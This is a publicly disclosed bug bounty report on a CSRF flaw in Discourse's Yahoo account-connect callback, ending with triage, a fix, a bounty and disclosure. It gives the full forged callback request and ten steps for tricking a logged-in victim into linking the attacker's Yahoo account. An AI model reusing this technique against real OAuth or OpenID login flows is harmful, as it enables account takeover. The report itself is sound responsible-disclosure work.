Account takeover at https://try.discourse.org due to no CSRF protection in connecting Yahoo account
State Resolved (Closed)
Disclosed publicly 2018-12-06T02:35:56.686Z
Reported To
Weakness Cross-Site Request Forgery (CSRF)
Bounty $512
Collapse


Timeline
submitted a report to Discourse .
2018-10-12T16:57:57.640Z

Hi

There is an option in https://try.discourse.org/u/testh1ay/preferences/account to connect our Yahoo account.

I noticed Connect Yahoo account option have the workflow with GET method and there is lack of csrf protection on connecting yahoo account which can help attacker into inducing victim to connect attacker's yahoo account to victim's discourse account, and it leads to full account takeover of victim's account.

Vulnerable Request:

GET /auth/yahoo/callback?_method=post&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=id_res&openid.return_to=https%3A%2F%2Ftry.discourse.org%2Fauth%2Fyahoo%2Fcallback%3F_method%3Dpost&openid.claimed_id=https%3A%2F%2Fme.yahoo.com%2Fa%2F7qAAT.abcd&openid.identity=https%3A%2F%2Fme.yahoo.com%2Fa%2F7qAAT.abcd&openid.realm=https%3A%2F%2Ftry.discourse.org&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_response&openid.ax.value.email=testhackeroneay%40yahoo.com&openid.ax.value.fullname=test%20hackerone&openid.ax.value.nickname=test&openid.assoc_handle=abcd&openid.response_nonce=2018-10-12T16%3A27%defg-&openid.signed=assoc_handle%2Cclaimed_id%2Cidentity%2Cmode%2Cns%2Cop_endpoint%2Cresponse_nonce%2Creturn_to%2Csigned%2Cax.value.email%2Cax.type.email%2Cax.value.fullname%2Cax.type.fullname%2Cax.value.nickname%2Cax.type.nickname%2Cns.ax%2Cax.mode%2Cpape.auth_level.nist&openid.op_endpoint=https%3A%2F%2Fopen.login.yahooapis.com%2Fopenid%2Fop%2Fauth&openid.ax.type.email=http%3A%2F%2Faxschema.org%2Fcontact%2Femail&openid.ax.type.fullname=http%3A%2F%2Faxschema.org%2FnamePerson&openid.ax.type.nickname=http%3A%2F%2Faxschema.org%2FnamePerson%2Ffriendly&openid.pape.auth_level.nist=0&openid.sig=9p%2Bxyz HTTP/1.1
Host: try.discourse.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Steps to reproduce:

  1. Attacker go to https://try.discourse.org/u/user/preferences/account
  2. Switch on burp interceptor and click on Yahoo connect.
  3. Go to burp interceptor and after forwarding some requests attacker will find the upper mentioned vulnerable request.
  4. Copy that and drop the request( here you saved the auth token generated by yahoo).
  5. Now feed the copied request to authenticated victim (as a html form or as an url).
  6. Victim get the message authentication complete and get redirected to https://try.discourse.org/?authComplete=true.
  7. Attacker open his browser and try to login with yahoo.
  8. Attacker get redirected to https://try.discourse.org/auth/yahoo/null
  9. Attacker open https://try.discourse.org
  10. Check Victim's account successfully compromised.

Impact

Account Takeover.

Regards,
Frans

  • 0 attachments:
avinash_ Activities::Comment
2018-10-27T13:21:13.595Z
Anybody to response?


ktistai Activities::Comment
2018-10-31T09:32:54.873Z
Hi @avinash_ , Thanks for your submission. We are currently reviewing your report and will get back to you once we have additional information to share. Kind regards, @ktistai


ktistai Activities::BugTriaged
2018-10-31T10:03:11.606Z
Hi @avinash_ Thank you for your submission! We were able to validate your report, and we have submitted it to the appropriate remediation team for review. They will let us know the final ruling on this report, and if/when a fix will be implemented. Please note that the status and severity are subject to change. Thanks, @ktistai


avinash_ Activities::Comment
2018-11-03T13:27:06.632Z
Hi @ktistai It seems fixed, On connecting yahoo account it is releasing csrf token(as state=token123). During reproducing the attack it behaving an error message as ```Sorry, there was an error authorizing your account. Perhaps you did not approve authorization?```. Can you please check this from your end ! Best Regards


discourse_team Activities::BugResolved
2018-11-05T21:09:23.848Z


Activities::BountyAwarded
2018-11-05T21:09:31.018Z


avinash_ Activities::Comment
2018-11-06T02:32:57.775Z
Hi @discourse_team Thanks for bounty :) Best Regards


avinash_ Activities::AgreedOnGoingPublic
2018-11-06T02:35:42.043Z
Preety nice bug... Can we please disclose this?


Activities::ReportBecamePublic
2018-12-06T02:35:56.704Z